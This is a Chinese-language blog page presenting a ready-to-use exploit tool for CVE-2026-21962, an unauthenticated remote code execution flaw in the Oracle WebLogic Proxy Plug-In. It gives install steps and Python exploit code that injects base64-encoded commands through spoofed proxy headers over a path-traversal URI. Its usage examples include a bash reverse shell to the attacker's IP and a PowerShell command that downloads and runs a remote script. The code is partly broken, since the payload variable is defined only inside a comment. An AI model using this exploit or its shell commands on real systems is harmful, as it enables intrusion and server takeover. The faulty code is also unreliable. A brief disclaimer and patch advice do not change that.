CVE-2026-21962 Oracle WebLogic 代理插件未授权 RCE 漏洞利用工具

CVE-2026-21962 Oracle WebLogic 代理插件未授权 RCE 漏洞利用工具 | 极客日志

chmod +x CVE-2026-21962.py

pip install requests

git clone https://github.com/Ashwesker/Ashwesker-CVE-2026-21962.git
cd Ashwesker-CVE-2026-21962

python3 CVE-2026-21962.py --help

python3 CVE-2026-21962.py <target_url> "<command>"

python3 CVE-2026-21962.py http://target:7001 "id && whoami && uname -a"

python3 CVE-2026-21962.py http://target:7001 "ls -la / && df -h"

nc -lvnp 4444

python3 CVE-2026-21962.py http://target:7001 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"

python3 CVE-2026-21962.py https://oracle-server:4443 "powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('http://your-server/shell.ps1')"

def exploit(target_url, command):
    # 漏洞利用端点（常见代理插件路径）
    vuln_paths = ["/weblogic/", "/wl_proxy/", "/bea_wls_internal/", "/_proxy/", "/proxy/"]
    
    # 构造触发反序列化/命令注入的恶意头部
    # 实际触发使用特制的 WL-Proxy-Client-IP 或类似头部
    # 结合绕过验证的特制 URI payload = f"cmd:{command}"
    
    # Base64 编码 Payload 以绕过 WAF/过滤器
    encoded_payload = base64.b64encode(payload.encode()).decode()
    
    # 构造恶意 HTTP 头部
    headers = {
        "WL-Proxy-Client-IP": f"127.0.0.1;{encoded_payload}",
        "Proxy-Client-IP": f"127.0.0.1;{encoded_payload}",
        "X-Forwarded-For": f"127.0.0.1;{encoded_payload}",
        "User-Agent": "Mozilla/5.0 (compatible; Exploit/1.0)",
        "Accept": "*/*",
        "Connection": "close"
    }
    
    # 触发插件漏洞的特制 URI
    uri = "/weblogic/..;/bea_wls_internal/ProxyServlet"
    
    # 尝试所有可能的漏洞路径
    for base_path in vuln_paths:
        full_url = f"{target_url.rstrip('/')}{base_path}{uri}"
        print(f"[*] 尝试路径：{full_url}")
        print(f"[*] 执行命令：{command}")
        try:
            # 使用 GET 请求，某些配置下 POST 也可用
            r = requests.get(full_url, headers=headers, timeout=12, verify=False, allow_redirects=False)
            # 根据 HTTP 状态码判断是否成功
            if r.status_code in [200, 302, 500]:
                print(f"[+] 可能成功！状态码：{r.status_code}")
                if r.text.strip():
                    print("\n可能的命令输出/响应:\n" + "-" * 60)
                    print(r.text[:1500]) # 显示前 1500 字符避免信息过多
                    print("-" * 60)
                else:
                    print("[+] 命令静默执行（无输出）")
                return True
            else:
                print(f"[-] 状态码 {r.status_code} - 此路径无漏洞")
        except Exception as e:
            print(f"[-] 路径 {full_url} 错误：{e}")
    print("\n[-] 所有路径测试完成 - 目标可能无漏洞或插件未暴露。")
    return False

if __name__ == "__main__":
    # 创建参数解析器
    parser = argparse.ArgumentParser(description="CVE-2026-21962 PoC - Oracle WebLogic Proxy Plug-In RCE")
    # 目标 URL 参数
    parser.add_argument("target", help="目标 URL (例如 http://target:7001 或 https://oracle-server:4443)")
    # 命令参数
    parser.add_argument("cmd", help="要执行的命令 (例如 'id' 或 'whoami' 或 'powershell -c ...' 或 'bash -i >& /dev/tcp/攻击者 IP/4444 0>&1')")
    # 解析参数并执行漏洞利用
    args = parser.parse_args()
    exploit(args.target, args.cmd)

# 漏洞检测的核心逻辑
# 1. 构造包含恶意命令的 Payload
# 2. 使用 Base64 编码绕过基本防护
# 3. 通过多个 HTTP 头部字段注入 Payload
# 4. 使用路径遍历技术访问代理 Servlet
# 5. 分析响应判断漏洞是否存在
# 关键点：
# - 使用分号分隔 IP 地址和命令 Payload
# - 尝试多个可能的代理插件路径
# - 支持 HTTP 和 HTTPS 协议
# - 包含完善的超时和错误处理

# 重要安全提示：
# 1. 此工具仅用于授权的安全测试
# 2. 在非授权系统上使用是非法的
# 3. 使用前需获得明确书面授权
# 4. 遵守所有适用法律法规
# 技术建议：
# 1. 及时应用 Oracle 2026 年 1 月关键补丁更新
# 2. 限制对受影响服务的网络访问
# 3. 监控 HTTP 流量中的可疑行为
# 4. 定期审查系统日志和安全控制措施

CVE-2026-21962 Oracle WebLogic 代理插件未授权 RCE 漏洞利用工具

CVE-2026-21962 - Oracle WebLogic Server Proxy Plug-In RCE

项目描述

功能特性

核心功能

高级特性

检测能力

安装指南

环境要求

安装步骤

验证安装

使用说明

基础使用

基本语法

参数说明

使用示例

1. 基本信息收集

2. 获取文件系统信息

3. 反向 Shell（Linux 目标）

4. Windows 目标利用

输出说明

注意事项

核心代码

主漏洞利用函数

命令行参数解析

漏洞检测逻辑

安全建议

版本兼容性

更多推荐文章

相关免费在线工具

CVE-2026-21962 Oracle WebLogic 代理插件未授权 RCE 漏洞利用工具

CVE-2026-21962 - Oracle WebLogic Server Proxy Plug-In RCE

项目描述

功能特性

核心功能

高级特性

检测能力

安装指南

环境要求

安装步骤

验证安装

使用说明

基础使用

基本语法

参数说明

使用示例

1. 基本信息收集

2. 获取文件系统信息

3. 反向 Shell（Linux 目标）

4. Windows 目标利用

输出说明

注意事项

核心代码

主漏洞利用函数

命令行参数解析

漏洞检测逻辑

安全建议

版本兼容性

微信扫一扫，关注极客日志

更多推荐文章

相关免费在线工具